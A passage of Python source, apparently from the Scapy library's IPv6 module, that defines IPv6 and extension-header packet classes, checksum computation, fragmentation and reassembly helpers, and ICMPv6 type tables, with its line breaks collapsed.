% (", ".join(s)) class _IPv6GuessPayload: name = "Dummy class that implements guess_payload_class() for IPv6" def default_payload_class(self, p): if self.nh == 58: # ICMPv6 t = orb(p[0]) if len(p) > 2 and (t == 139 or t == 140): # Node Info Query return _niquery_guesser(p) if len(p) >= 
icmp6typesminhdrlen.get(t, float("inf")): # Other ICMPv6 messages # noqa: E501 if t == 130 and len(p) >= 28: # RFC 3810 - 8.1. Query Version Distinctions return ICMPv6MLQuery2 return icmp6typescls.get(t, Raw) return Raw elif self.nh == 135 and len(p) > 3: # Mobile IPv6 return _mip6_mhtype2cls.get(orb(p[2]), MIP6MH_Generic) elif self.nh == 43 and orb(p[2]) == 4: # Segment Routing header return IPv6ExtHdrSegmentRouting return ipv6nhcls.get(self.nh, Raw) class IPv6(_IPv6GuessPayload, Packet, IPTools): name = "IPv6" fields_desc = [BitField("version", 6, 4), BitField("tc", 0, 8), # TODO: IPv6, ByteField ? BitField("fl", 0, 20), ShortField("plen", None), ByteEnumField("nh", 59, ipv6nh), ByteField("hlim", 64), SourceIP6Field("src", "dst"), # dst is for src @ selection DestIP6Field("dst", "::1")] def route(self): """Used to select the L2 address""" dst = self.dst if isinstance(dst, Gen): dst = next(iter(dst)) return conf.route6.route(dst) def mysummary(self): return "%s > %s (%i)" % (self.src, self.dst, self.nh) def post_build(self, p, pay): p += pay if self.plen is None: tmp_len = len(p) - 40 p = p[:4] + struct.pack("!H", tmp_len) + p[6:] return p def extract_padding(self, data): """Extract the IPv6 payload""" if self.plen == 0 and self.nh == 0 and len(data) >= 8: # Extract Hop-by-Hop extension length hbh_len = orb(data[1]) hbh_len = 8 + hbh_len * 8 # Extract length from the Jumbogram option # Note: the following algorithm take advantage of the Jumbo option # mandatory alignment (4n + 2, RFC2675 Section 2) jumbo_len = None idx = 0 offset = 4 * idx + 2 while offset <= len(data): opt_type = orb(data[offset]) if opt_type == 0xc2: # Jumbo option jumbo_len = struct.unpack("I", data[offset + 2:offset + 2 + 4])[0] # noqa: E501 break offset = 4 * idx + 2 idx += 1 if jumbo_len is None: warning("Scapy did not find a Jumbo option") jumbo_len = 0 tmp_len = hbh_len + jumbo_len else: tmp_len = self.plen return data[:tmp_len], data[tmp_len:] def hashret(self): if self.nh == 58 and isinstance(self.payload, _ICMPv6): if self.payload.type < 128: return self.payload.payload.hashret() elif (self.payload.type in [133, 134, 135, 136, 144, 145]): return struct.pack("B", self.nh) + self.payload.hashret() if not conf.checkIPinIP and self.nh in [4, 41]: # IP, IPv6 return self.payload.hashret() nh = self.nh sd = self.dst ss = self.src if self.nh == 43 and isinstance(self.payload, IPv6ExtHdrRouting): # With routing header, the destination is the last # address of the IPv6 list if segleft > 0 nh = self.payload.nh try: sd = self.addresses[-1] except IndexError: sd = '::1' # TODO: big bug with ICMPv6 error messages as the destination of IPerror6 # noqa: E501 # could be anything from the original list ... if 1: sd = inet_pton(socket.AF_INET6, sd) for a in self.addresses: a = inet_pton(socket.AF_INET6, a) sd = strxor(sd, a) sd = inet_ntop(socket.AF_INET6, sd) if self.nh == 43 and isinstance(self.payload, IPv6ExtHdrSegmentRouting): # noqa: E501 # With segment routing header (rh == 4), the destination is # the first address of the IPv6 addresses list try: sd = self.addresses[0] except IndexError: sd = self.dst if self.nh == 44 and isinstance(self.payload, IPv6ExtHdrFragment): nh = self.payload.nh if self.nh == 0 and isinstance(self.payload, IPv6ExtHdrHopByHop): nh = self.payload.nh if self.nh == 60 and isinstance(self.payload, IPv6ExtHdrDestOpt): foundhao = None for o in self.payload.options: if isinstance(o, HAO): foundhao = o if foundhao: nh = self.payload.nh # XXX what if another extension follows ? 
ss = foundhao.hoa if conf.checkIPsrc and conf.checkIPaddr and not in6_ismaddr(sd): sd = inet_pton(socket.AF_INET6, sd) ss = inet_pton(socket.AF_INET6, self.src) return strxor(sd, ss) + struct.pack("B", nh) + self.payload.hashret() # noqa: E501 else: return struct.pack("B", nh) + self.payload.hashret() def answers(self, other): if not conf.checkIPinIP: # skip IP in IP and IPv6 in IP if self.nh in [4, 41]: return self.payload.answers(other) if isinstance(other, IPv6) and other.nh in [4, 41]: return self.answers(other.payload) if isinstance(other, IP) and other.proto in [4, 41]: return self.answers(other.payload) if not isinstance(other, IPv6): # self is reply, other is request return False if conf.checkIPaddr: # ss = inet_pton(socket.AF_INET6, self.src) sd = inet_pton(socket.AF_INET6, self.dst) os = inet_pton(socket.AF_INET6, other.src) od = inet_pton(socket.AF_INET6, other.dst) # request was sent to a multicast address (other.dst) # Check reply destination addr matches request source addr (i.e # sd == os) except when reply is multicasted too # XXX test mcast scope matching ? if in6_ismaddr(other.dst): if in6_ismaddr(self.dst): if ((od == sd) or (in6_isaddrllallnodes(self.dst) and in6_isaddrllallservers(other.dst))): # noqa: E501 return self.payload.answers(other.payload) return False if (os == sd): return self.payload.answers(other.payload) return False elif (sd != os): # or ss != od): <- removed for ICMP errors return False if self.nh == 58 and isinstance(self.payload, _ICMPv6) and self.payload.type < 128: # noqa: E501 # ICMPv6 Error message -> generated by IPv6 packet # Note : at the moment, we jump the ICMPv6 specific class # to call answers() method of erroneous packet (over # initial packet). There can be cases where an ICMPv6 error # class could implement a specific answers method that perform # a specific task. Currently, don't see any use ... return self.payload.payload.answers(other) elif other.nh == 0 and isinstance(other.payload, IPv6ExtHdrHopByHop): return self.payload.answers(other.payload) elif other.nh == 44 and isinstance(other.payload, IPv6ExtHdrFragment): return self.payload.answers(other.payload.payload) elif other.nh == 43 and isinstance(other.payload, IPv6ExtHdrRouting): return self.payload.answers(other.payload.payload) # Buggy if self.payload is a IPv6ExtHdrRouting # noqa: E501 elif other.nh == 43 and isinstance(other.payload, IPv6ExtHdrSegmentRouting): # noqa: E501 return self.payload.answers(other.payload.payload) # Buggy if self.payload is a IPv6ExtHdrRouting # noqa: E501 elif other.nh == 60 and isinstance(other.payload, IPv6ExtHdrDestOpt): return self.payload.payload.answers(other.payload.payload) elif self.nh == 60 and isinstance(self.payload, IPv6ExtHdrDestOpt): # BU in reply to BRR, for instance # noqa: E501 return self.payload.payload.answers(other.payload) else: if (self.nh != other.nh): return False return self.payload.answers(other.payload) class _IPv46(IP): """ This class implements a dispatcher that is used to detect the IP version while parsing Raw IP pcap files. 
""" @classmethod def dispatch_hook(cls, _pkt=None, *_, **kargs): if _pkt: if orb(_pkt[0]) >> 4 == 6: return IPv6 elif kargs.get("version") == 6: return IPv6 return IP def inet6_register_l3(l2, l3): return getmacbyip6(l3.dst) conf.neighbor.register_l3(Ether, IPv6, inet6_register_l3) class IPerror6(IPv6): name = "IPv6 in ICMPv6" def answers(self, other): if not isinstance(other, IPv6): return False sd = inet_pton(socket.AF_INET6, self.dst) ss = inet_pton(socket.AF_INET6, self.src) od = inet_pton(socket.AF_INET6, other.dst) os = inet_pton(socket.AF_INET6, other.src) # Make sure that the ICMPv6 error is related to the packet scapy sent if isinstance(self.underlayer, _ICMPv6) and self.underlayer.type < 128: # find upper layer for self (possible citation) selfup = self.payload while selfup is not None and isinstance(selfup, _IPv6ExtHdr): selfup = selfup.payload # find upper layer for other (initial packet). Also look for RH otherup = other.payload request_has_rh = False while otherup is not None and isinstance(otherup, _IPv6ExtHdr): if isinstance(otherup, IPv6ExtHdrRouting): request_has_rh = True otherup = otherup.payload if ((ss == os and sd == od) or # < Basic case (ss == os and request_has_rh)): # ^ Request has a RH : don't check dst address # Let's deal with possible MSS Clamping if (isinstance(selfup, TCP) and isinstance(otherup, TCP) and selfup.options != otherup.options): # seems clamped # Save fields modified by MSS clamping old_otherup_opts = otherup.options old_otherup_cksum = otherup.chksum old_otherup_dataofs = otherup.dataofs old_selfup_opts = selfup.options old_selfup_cksum = selfup.chksum old_selfup_dataofs = selfup.dataofs # Nullify them otherup.options = [] otherup.chksum = 0 otherup.dataofs = 0 selfup.options = [] selfup.chksum = 0 selfup.dataofs = 0 # Test it and save result s1 = raw(selfup) s2 = raw(otherup) tmp_len = min(len(s1), len(s2)) res = s1[:tmp_len] == s2[:tmp_len] # recall saved values otherup.options = old_otherup_opts otherup.chksum = old_otherup_cksum otherup.dataofs = old_otherup_dataofs selfup.options = old_selfup_opts selfup.chksum = old_selfup_cksum selfup.dataofs = old_selfup_dataofs return res s1 = raw(selfup) s2 = raw(otherup) tmp_len = min(len(s1), len(s2)) return s1[:tmp_len] == s2[:tmp_len] return False def mysummary(self): return Packet.mysummary(self) ############################################################################# ############################################################################# # Upper Layer Checksum computation # ############################################################################# ############################################################################# class PseudoIPv6(Packet): # IPv6 Pseudo-header for checksum computation name = "Pseudo IPv6 Header" fields_desc = [IP6Field("src", "::"), IP6Field("dst", "::"), ShortField("uplen", None), BitField("zero", 0, 24), ByteField("nh", 0)] def in6_chksum(nh, u, p): """ As Specified in RFC 2460 - 8.1 Upper-Layer Checksums Performs IPv6 Upper Layer checksum computation. This function operates by filling a pseudo header class instance (PseudoIPv6) with: - Next Header value - the address of _final_ destination (if some Routing Header with non segleft field is present in underlayer classes, last address is used.) - the address of _real_ source (basically the source address of an IPv6 class instance available in the underlayer or the source address in HAO option if some Destination Option header found in underlayer includes this option). 
- the length is the length of provided payload string ('p') :param nh: value of upper layer protocol :param u: upper layer instance (TCP, UDP, ICMPv6*, ). Instance must be provided with all under layers (IPv6 and all extension headers, for example) :param p: the payload of the upper layer provided as a string """ ph6 = PseudoIPv6() ph6.nh = nh rthdr = 0 hahdr = 0 final_dest_addr_found = 0 while u is not None and not isinstance(u, IPv6): if (isinstance(u, IPv6ExtHdrRouting) and u.segleft != 0 and len(u.addresses) != 0 and final_dest_addr_found == 0): rthdr = u.addresses[-1] final_dest_addr_found = 1 elif (isinstance(u, IPv6ExtHdrSegmentRouting) and u.segleft != 0 and len(u.addresses) != 0 and final_dest_addr_found == 0): rthdr = u.addresses[0] final_dest_addr_found = 1 elif (isinstance(u, IPv6ExtHdrDestOpt) and (len(u.options) == 1) and isinstance(u.options[0], HAO)): hahdr = u.options[0].hoa u = u.underlayer if u is None: warning("No IPv6 underlayer to compute checksum. Leaving null.") return 0 if hahdr: ph6.src = hahdr else: ph6.src = u.src if rthdr: ph6.dst = rthdr else: ph6.dst = u.dst ph6.uplen = len(p) ph6s = raw(ph6) return checksum(ph6s + p) ############################################################################# ############################################################################# # Extension Headers # ############################################################################# ############################################################################# # Inherited by all extension header classes class _IPv6ExtHdr(_IPv6GuessPayload, Packet): name = 'Abstract IPv6 Option Header' aliastypes = [IPv6, IPerror6] # TODO ... # IPv6 options for Extension Headers # _hbhopts = {0x00: "Pad1", 0x01: "PadN", 0x04: "Tunnel Encapsulation Limit", 0x05: "Router Alert", 0x06: "Quick-Start", 0xc2: "Jumbo Payload", 0xc9: "Home Address Option"} class _OTypeField(ByteEnumField): """ Modified BytEnumField that displays information regarding the IPv6 option based on its option type value (What should be done by nodes that process the option if they do not understand it ...) It is used by Jumbo, Pad1, PadN, RouterAlert, HAO options """ pol = {0x00: "00: skip", 0x40: "01: discard", 0x80: "10: discard+ICMP", 0xC0: "11: discard+ICMP not mcast"} enroutechange = {0x00: "0: Don't change en-route", 0x20: "1: May change en-route"} def i2repr(self, pkt, x): s = self.i2s.get(x, repr(x)) polstr = self.pol[(x & 0xC0)] enroutechangestr = self.enroutechange[(x & 0x20)] return "%s [%s, %s]" % (s, polstr, enroutechangestr) class HBHOptUnknown(Packet): # IPv6 Hop-By-Hop Option name = "Scapy6 Unknown Option" fields_desc = [_OTypeField("otype", 0x01, _hbhopts), FieldLenField("optlen", None, length_of="optdata", fmt="B"), StrLenField("optdata", "", length_from=lambda pkt: pkt.optlen)] def alignment_delta(self, curpos): # By default, no alignment requirement """ As specified in section 4.2 of RFC 2460, every options has an alignment requirement usually expressed xn+y, meaning the Option Type must appear at an integer multiple of x octest from the start of the header, plus y octet. That function is provided the current position from the start of the header and returns required padding length. 
""" return 0 @classmethod def dispatch_hook(cls, _pkt=None, *args, **kargs): if _pkt: o = orb(_pkt[0]) # Option type if o in _hbhoptcls: return _hbhoptcls[o] return cls def extract_padding(self, p): return b"", p class Pad1(Packet): # IPv6 Hop-By-Hop Option name = "Pad1" fields_desc = [_OTypeField("otype", 0x00, _hbhopts)] def alignment_delta(self, curpos): # No alignment requirement return 0 def extract_padding(self, p): return b"", p class PadN(Packet): # IPv6 Hop-By-Hop Option name = "PadN" fields_desc = [_OTypeField("otype", 0x01, _hbhopts), FieldLenField("optlen", None, length_of="optdata", fmt="B"), StrLenField("optdata", "", length_from=lambda pkt: pkt.optlen)] def alignment_delta(self, curpos): # No alignment requirement return 0 def extract_padding(self, p): return b"", p class RouterAlert(Packet): # RFC 2711 - IPv6 Hop-By-Hop Option name = "Router Alert" fields_desc = [_OTypeField("otype", 0x05, _hbhopts), ByteField("optlen", 2), ShortEnumField("value", None, {0: "Datagram contains a MLD message", 1: "Datagram contains RSVP message", 2: "Datagram contains an Active Network message", # noqa: E501 68: "NSIS NATFW NSLP", 69: "MPLS OAM", 65535: "Reserved"})] # TODO : Check IANA has not defined new values for value field of RouterAlertOption # noqa: E501 # TODO : Now that we have that option, we should do something in MLD class that need it # noqa: E501 # TODO : IANA has defined ranges of values which can't be easily represented here. # noqa: E501 # iana.org/assignments/ipv6-routeralert-values/ipv6-routeralert-values.xhtml def alignment_delta(self, curpos): # alignment requirement : 2n+0 x = 2 y = 0 delta = x * ((curpos - y + x - 1) // x) + y - curpos return delta def extract_padding(self, p): return b"", p class Jumbo(Packet): # IPv6 Hop-By-Hop Option name = "Jumbo Payload" fields_desc = [_OTypeField("otype", 0xC2, _hbhopts), ByteField("optlen", 4), IntField("jumboplen", None)] def alignment_delta(self, curpos): # alignment requirement : 4n+2 x = 4 y = 2 delta = x * ((curpos - y + x - 1) // x) + y - curpos return delta def extract_padding(self, p): return b"", p class HAO(Packet): # IPv6 Destination Options Header Option name = "Home Address Option" fields_desc = [_OTypeField("otype", 0xC9, _hbhopts), ByteField("optlen", 16), IP6Field("hoa", "::")] def alignment_delta(self, curpos): # alignment requirement : 8n+6 x = 8 y = 6 delta = x * ((curpos - y + x - 1) // x) + y - curpos return delta def extract_padding(self, p): return b"", p _hbhoptcls = {0x00: Pad1, 0x01: PadN, 0x05: RouterAlert, 0xC2: Jumbo, 0xC9: HAO} # Hop-by-Hop Extension Header # class _OptionsField(PacketListField): __slots__ = ["curpos"] def __init__(self, name, default, cls, curpos, *args, **kargs): self.curpos = curpos PacketListField.__init__(self, name, default, cls, *args, **kargs) def i2len(self, pkt, i): return len(self.i2m(pkt, i)) def i2m(self, pkt, x): autopad = None try: autopad = getattr(pkt, "autopad") # Hack : 'autopad' phantom field except Exception: autopad = 1 if not autopad: return b"".join(map(str, x)) curpos = self.curpos s = b"" for p in x: d = p.alignment_delta(curpos) curpos += d if d == 1: s += raw(Pad1()) elif d != 0: s += raw(PadN(optdata=b'\x00' * (d - 2))) pstr = raw(p) curpos += len(pstr) s += pstr # Let's make the class including our option field # a multiple of 8 octets long d = curpos % 8 if d == 0: return s d = 8 - d if d == 1: s += raw(Pad1()) elif d != 0: s += raw(PadN(optdata=b'\x00' * (d - 2))) return s def addfield(self, pkt, s, val): return s + self.i2m(pkt, val) class 
_PhantomAutoPadField(ByteField): def addfield(self, pkt, s, val): return s def getfield(self, pkt, s): return s, 1 def i2repr(self, pkt, x): if x: return "On" return "Off" class IPv6ExtHdrHopByHop(_IPv6ExtHdr): name = "IPv6 Extension Header - Hop-by-Hop Options Header" fields_desc = [ByteEnumField("nh", 59, ipv6nh), FieldLenField("len", None, length_of="options", fmt="B", adjust=lambda pkt, x: (x + 2 + 7) // 8 - 1), _PhantomAutoPadField("autopad", 1), # autopad activated by default # noqa: E501 _OptionsField("options", [], HBHOptUnknown, 2, length_from=lambda pkt: (8 * (pkt.len + 1)) - 2)] # noqa: E501 overload_fields = {IPv6: {"nh": 0}} # Destination Option Header # class IPv6ExtHdrDestOpt(_IPv6ExtHdr): name = "IPv6 Extension Header - Destination Options Header" fields_desc = [ByteEnumField("nh", 59, ipv6nh), FieldLenField("len", None, length_of="options", fmt="B", adjust=lambda pkt, x: (x + 2 + 7) // 8 - 1), _PhantomAutoPadField("autopad", 1), # autopad activated by default # noqa: E501 _OptionsField("options", [], HBHOptUnknown, 2, length_from=lambda pkt: (8 * (pkt.len + 1)) - 2)] # noqa: E501 overload_fields = {IPv6: {"nh": 60}} # Routing Header # class IPv6ExtHdrRouting(_IPv6ExtHdr): name = "IPv6 Option Header Routing" fields_desc = [ByteEnumField("nh", 59, ipv6nh), FieldLenField("len", None, count_of="addresses", fmt="B", adjust=lambda pkt, x:2 * x), # in 8 bytes blocks # noqa: E501 ByteField("type", 0), ByteField("segleft", None), BitField("reserved", 0, 32), # There is meaning in this field ... # noqa: E501 IP6ListField("addresses", [], length_from=lambda pkt: 8 * pkt.len)] overload_fields = {IPv6: {"nh": 43}} def post_build(self, pkt, pay): if self.segleft is None: pkt = pkt[:3] + struct.pack("B", len(self.addresses)) + pkt[4:] return _IPv6ExtHdr.post_build(self, pkt, pay) # Segment Routing Header # # This implementation is based on draft 06, available at: # https://tools.ietf.org/html/draft-ietf-6man-segment-routing-header-06 class IPv6ExtHdrSegmentRoutingTLV(Packet): name = "IPv6 Option Header Segment Routing - Generic TLV" fields_desc = [ByteField("type", 0), ByteField("len", 0), ByteField("reserved", 0), ByteField("flags", 0), StrLenField("value", "", length_from=lambda pkt: pkt.len)] def extract_padding(self, p): return b"", p registered_sr_tlv = {} @classmethod def register_variant(cls): cls.registered_sr_tlv[cls.type.default] = cls @classmethod def dispatch_hook(cls, pkt=None, *args, **kargs): if pkt: tmp_type = orb(pkt[0]) return cls.registered_sr_tlv.get(tmp_type, cls) return cls class IPv6ExtHdrSegmentRoutingTLVIngressNode(IPv6ExtHdrSegmentRoutingTLV): name = "IPv6 Option Header Segment Routing - Ingress Node TLV" fields_desc = [ByteField("type", 1), ByteField("len", 18), ByteField("reserved", 0), ByteField("flags", 0), IP6Field("ingress_node", "::1")] class IPv6ExtHdrSegmentRoutingTLVEgressNode(IPv6ExtHdrSegmentRoutingTLV): name = "IPv6 Option Header Segment Routing - Egress Node TLV" fields_desc = [ByteField("type", 2), ByteField("len", 18), ByteField("reserved", 0), ByteField("flags", 0), IP6Field("egress_node", "::1")] class IPv6ExtHdrSegmentRoutingTLVPadding(IPv6ExtHdrSegmentRoutingTLV): name = "IPv6 Option Header Segment Routing - Padding TLV" fields_desc = [ByteField("type", 4), FieldLenField("len", None, length_of="padding", fmt="B"), StrLenField("padding", b"\x00", length_from=lambda pkt: pkt.len)] # noqa: E501 class IPv6ExtHdrSegmentRouting(_IPv6ExtHdr): name = "IPv6 Option Header Segment Routing" fields_desc = [ByteEnumField("nh", 59, ipv6nh), ByteField("len", 
None), ByteField("type", 4), ByteField("segleft", None), ByteField("lastentry", None), BitField("unused1", 0, 1), BitField("protected", 0, 1), BitField("oam", 0, 1), BitField("alert", 0, 1), BitField("hmac", 0, 1), BitField("unused2", 0, 3), ShortField("tag", 0), IP6ListField("addresses", ["::1"], count_from=lambda pkt: (pkt.lastentry + 1)), PacketListField("tlv_objects", [], IPv6ExtHdrSegmentRoutingTLV, length_from=lambda pkt: 8 * pkt.len - 16 * ( pkt.lastentry + 1 ))] overload_fields = {IPv6: {"nh": 43}} def post_build(self, pkt, pay): if self.len is None: # The extension must be align on 8 bytes tmp_mod = (len(pkt) - 8) % 8 if tmp_mod == 1: warning("IPv6ExtHdrSegmentRouting(): can't pad 1 byte!") elif tmp_mod >= 2: # Add the padding extension tmp_pad = b"\x00" * (tmp_mod - 2) tlv = IPv6ExtHdrSegmentRoutingTLVPadding(padding=tmp_pad) pkt += raw(tlv) tmp_len = (len(pkt) - 8) // 8 pkt = pkt[:1] + struct.pack("B", tmp_len) + pkt[2:] if self.segleft is None: tmp_len = len(self.addresses) if tmp_len: tmp_len -= 1 pkt = pkt[:3] + struct.pack("B", tmp_len) + pkt[4:] if self.lastentry is None: lastentry = len(self.addresses) if lastentry == 0: warning( "IPv6ExtHdrSegmentRouting(): the addresses list is empty!" ) else: lastentry -= 1 pkt = pkt[:4] + struct.pack("B", lastentry) + pkt[5:] return _IPv6ExtHdr.post_build(self, pkt, pay) # Fragmentation Header # class IPv6ExtHdrFragment(_IPv6ExtHdr): name = "IPv6 Extension Header - Fragmentation header" fields_desc = [ByteEnumField("nh", 59, ipv6nh), BitField("res1", 0, 8), BitField("offset", 0, 13), BitField("res2", 0, 2), BitField("m", 0, 1), IntField("id", None)] overload_fields = {IPv6: {"nh": 44}} def defragment6(packets): """ Performs defragmentation of a list of IPv6 packets. Packets are reordered. Crap is dropped. What lacks is completed by 'X' characters. """ # Remove non fragments lst = [x for x in packets if IPv6ExtHdrFragment in x] if not lst: return [] id = lst[0][IPv6ExtHdrFragment].id llen = len(lst) lst = [x for x in lst if x[IPv6ExtHdrFragment].id == id] if len(lst) != llen: warning("defragment6: some fragmented packets have been removed from list") # noqa: E501 llen = len(lst) # reorder fragments res = [] while lst: min_pos = 0 min_offset = lst[0][IPv6ExtHdrFragment].offset for p in lst: cur_offset = p[IPv6ExtHdrFragment].offset if cur_offset < min_offset: min_pos = 0 min_offset = cur_offset res.append(lst[min_pos]) del(lst[min_pos]) # regenerate the fragmentable part fragmentable = b"" for p in res: q = p[IPv6ExtHdrFragment] offset = 8 * q.offset if offset != len(fragmentable): warning("Expected an offset of %d. Found %d. Padding with XXXX" % (len(fragmentable), offset)) # noqa: E501 fragmentable += b"X" * (offset - len(fragmentable)) fragmentable += raw(q.payload) # Regenerate the unfragmentable part. q = res[0] nh = q[IPv6ExtHdrFragment].nh q[IPv6ExtHdrFragment].underlayer.nh = nh q[IPv6ExtHdrFragment].underlayer.plen = len(fragmentable) del q[IPv6ExtHdrFragment].underlayer.payload q /= conf.raw_layer(load=fragmentable) del(q.plen) return IPv6(raw(q)) def fragment6(pkt, fragSize): """ Performs fragmentation of an IPv6 packet. Provided packet ('pkt') must already contain an IPv6ExtHdrFragment() class. 'fragSize' argument is the expected maximum size of fragments (MTU). The list of packets is returned. If packet does not contain an IPv6ExtHdrFragment class, it is returned in result list. 
""" pkt = pkt.copy() if IPv6ExtHdrFragment not in pkt: # TODO : automatically add a fragment before upper Layer # at the moment, we do nothing and return initial packet # as single element of a list return [pkt] # If the payload is bigger than 65535, a Jumbo payload must be used, as # an IPv6 packet can't be bigger than 65535 bytes. if len(raw(pkt[IPv6ExtHdrFragment])) > 65535: warning("An IPv6 packet can'be bigger than 65535, please use a Jumbo payload.") # noqa: E501 return [] s = raw(pkt) # for instantiation to get upper layer checksum right if len(s) <= fragSize: return [pkt] # Fragmentable part : fake IPv6 for Fragmentable part length computation fragPart = pkt[IPv6ExtHdrFragment].payload tmp = raw(IPv6(src="::1", dst="::1") / fragPart) fragPartLen = len(tmp) - 40 # basic IPv6 header length fragPartStr = s[-fragPartLen:] # Grab Next Header for use in Fragment Header nh = pkt[IPv6ExtHdrFragment].nh # Keep fragment header fragHeader = pkt[IPv6ExtHdrFragment] del fragHeader.payload # detach payload # Unfragmentable Part unfragPartLen = len(s) - fragPartLen - 8 unfragPart = pkt del pkt[IPv6ExtHdrFragment].underlayer.payload # detach payload # Cut the fragmentable part to fit fragSize. Inner fragments have # a length that is an integer multiple of 8 octets. last Frag MTU # can be anything below MTU lastFragSize = fragSize - unfragPartLen - 8 innerFragSize = lastFragSize - (lastFragSize % 8) if lastFragSize <= 0 or innerFragSize == 0: warning("Provided fragment size value is too low. " + "Should be more than %d" % (unfragPartLen + 8)) return [unfragPart / fragHeader / fragPart] remain = fragPartStr res = [] fragOffset = 0 # offset, incremeted during creation fragId = random.randint(0, 0xffffffff) # random id ... if fragHeader.id is not None: # ... except id provided by user fragId = fragHeader.id fragHeader.m = 1 fragHeader.id = fragId fragHeader.nh = nh # Main loop : cut, fit to FRAGSIZEs, fragOffset, Id ... 
while True: if (len(remain) > lastFragSize): tmp = remain[:innerFragSize] remain = remain[innerFragSize:] fragHeader.offset = fragOffset # update offset fragOffset += (innerFragSize // 8) # compute new one if IPv6 in unfragPart: unfragPart[IPv6].plen = None tempo = unfragPart / fragHeader / conf.raw_layer(load=tmp) res.append(tempo) else: fragHeader.offset = fragOffset # update offSet fragHeader.m = 0 if IPv6 in unfragPart: unfragPart[IPv6].plen = None tempo = unfragPart / fragHeader / conf.raw_layer(load=remain) res.append(tempo) break return res # AH Header # # class _AHFieldLenField(FieldLenField): # def getfield(self, pkt, s): # l = getattr(pkt, self.fld) # l = (l*8)-self.shift # i = self.m2i(pkt, s[:l]) # return s[l:],i # class _AHICVStrLenField(StrLenField): # def i2len(self, pkt, x): # class IPv6ExtHdrAH(_IPv6ExtHdr): # name = "IPv6 Extension Header - AH" # fields_desc = [ ByteEnumField("nh", 59, ipv6nh), # _AHFieldLenField("len", None, "icv"), # ShortField("res", 0), # IntField("spi", 0), # IntField("sn", 0), # _AHICVStrLenField("icv", None, "len", shift=2) ] # overload_fields = {IPv6: { "nh": 51 }} # def post_build(self, pkt, pay): # if self.len is None: # pkt = pkt[0]+struct.pack("!B", 2*len(self.addresses))+pkt[2:] # if self.segleft is None: # pkt = pkt[:3]+struct.pack("!B", len(self.addresses))+pkt[4:] # return _IPv6ExtHdr.post_build(self, pkt, pay) # ESP Header # # class IPv6ExtHdrESP(_IPv6extHdr): # name = "IPv6 Extension Header - ESP" # fields_desc = [ IntField("spi", 0), # IntField("sn", 0), # # there is things to extract from IKE work # ] # overloads_fields = {IPv6: { "nh": 50 }} ############################################################################# ############################################################################# # ICMPv6* Classes # ############################################################################# ############################################################################# icmp6typescls = {1: "ICMPv6DestUnreach", 2: "ICMPv6PacketTooBig", 3: "ICMPv6TimeExceeded", 4: "ICMPv6ParamProblem", 128: "ICMPv6EchoRequest", 129: "ICMPv6EchoReply", 130: "ICMPv6MLQuery", # MLDv1 or MLDv2 131: "ICMPv6MLReport", 132: "ICMPv6MLDone", 133: "ICMPv6ND_RS", 134: "ICMPv6ND_RA", 135: "ICMPv6ND_NS", 136: "ICMPv6ND_NA", 137: "ICMPv6ND_Redirect", # 138: Do Me - RFC 2894 - Seems painful 139: "ICMPv6NIQuery", 140: "ICMPv6NIReply", 141: "ICMPv6ND_INDSol", 142: "ICMPv6ND_INDAdv", 143: "ICMPv6MLReport2", 144: "ICMPv6HAADRequest", 145: "ICMPv6HAADReply", 146: "ICMPv6MPSol", 147: "ICMPv6MPAdv", # 148: Do Me - SEND related - RFC 3971 # 149: Do Me - SEND related - RFC 3971 151: "ICMPv6MRD_Advertisement", 152: "ICMPv6MRD_Solicitation", 153: "ICMPv6MRD_Termination", } icmp6typesminhdrlen = {1: 8, 2: 8, 3: 8, 4: 8, 128: 8, 129: 8, 130: 24, 131: 24, 132: 24, 133: 8, 134: 16, 135: 24, 136: 24, 137: 40, # 139: # 140 141: 8, 142: 8, 143: 8, 144: 8, 145: 8, 146: 8, 147: 8, 151: 8, 152: 4, 153: 4 } icmp6types = {1: "Destination unreachable", 2: "Packet too big", 3: "Time exceeded", 4: "Parameter problem", 100: "Private Experimentation", 101: "Private Experimentation", 128: "Echo Request", 129: "Echo Reply", 130: "MLD Query", 131: "MLD Report", 132: "MLD Done", 133: "Router Solicitation", 134: "Router Advertisement", 135: "Neighbor Solicitation", 136: "Neighbor Advertisement", 137: "Redirect Message", 138: "Router Renumbering", 139: "ICMP Node Information Query", 140: "ICMP Node Information Response", 141: "Inverse Neighbor Discovery Solicitation Message", 142: "Inverse Neighbor 
Discovery Advertisement Message", 143: "MLD Report Version 2", 144: "Home Agent Address Discovery Request Message", 145: "Home Agent Address Discovery Reply Message", 146: "Mobile Prefix Solicitation", 147: "Mobile Prefix Advertisement", 148: "Certification Path Solicitation", 149: "Certification Path Advertisement", 151: "Multicast Router Advertisement", 152: "Multicast Router Solicitation", 153: "Multicast Router Termination", 200: "Private Experimentation", 201: "Private Experimentation"} class _ICMPv6(Packet): name = "ICMPv6 dummy class" overload_fields = {IPv6: {"nh": 58}} def post_build(self, p, pay): p += pay if self.cksum is None: chksum = in6_chksum(58, self.underlayer, p) p = p[:2] + struct.pack("!H", chksum) + p[4:] return p def hashret(self): return self.payload.hashret() def answers(self, other): # isinstance(self.underlayer, _IPv6ExtHdr) may introduce a bug ... if (isinstance(self.underlayer, IPerror6) or isinstance(self.underlayer, _IPv6ExtHdr) and isinstance(other, _ICMPv6)): if not ((self.type == other.type) and (self.code == other.code)): return 0 return 1 return 0 class _ICMPv6Error(_ICMPv6): name = "ICMPv6 errors dummy class" def guess_payload_class(self, p): return IPerror6 class ICMPv6Unknown(_ICMPv6): name = "Scapy6 ICMPv6 fallback class" fields_desc = [ByteEnumField("type", 1, icmp6types), ByteField("code", 0), XShortField("cksum", None), StrField("msgbody", "")] # RFC 2460 # class ICMPv6DestUnreach(_ICMPv6Error): name = "ICMPv6 Destination Unreachable" fields_desc = [ByteEnumField("type", 1, icmp6types), ByteEnumField("code", 0, {0: "No route to destination", 1: "Communication with destination administratively prohibited", # noqa: E501 2: "Beyond scope of source address", # noqa: E501 3: "Address unreachable", 4: "Port unreachable"}), XShortField("cksum", None), ByteField("length", 0), X3BytesField("unused", 0)] class ICMPv6PacketTooBig(_ICMPv6Error): name = "ICMPv6 Packet Too Big" fields_desc = [ByteEnumField("type", 2, icmp6types), ByteField("code", 0), XShortField("cksum", None), IntField("mtu", 1280)] class ICMPv6TimeExceeded(_ICMPv6Error): name = "ICMPv6 Time Exceeded" fields_desc = [ByteEnumField("type", 3, icmp6types), ByteEnumField("code", 0, {0: "hop limit exceeded in transit", # noqa: E501 1: "fragment reassembly time exceeded"}), # noqa: E501 XShortField("cksum", None), ByteField("length", 0), X3BytesField("unused", 0)] # The default pointer value is set to the next header field of # the encapsulated IPv6 packet class 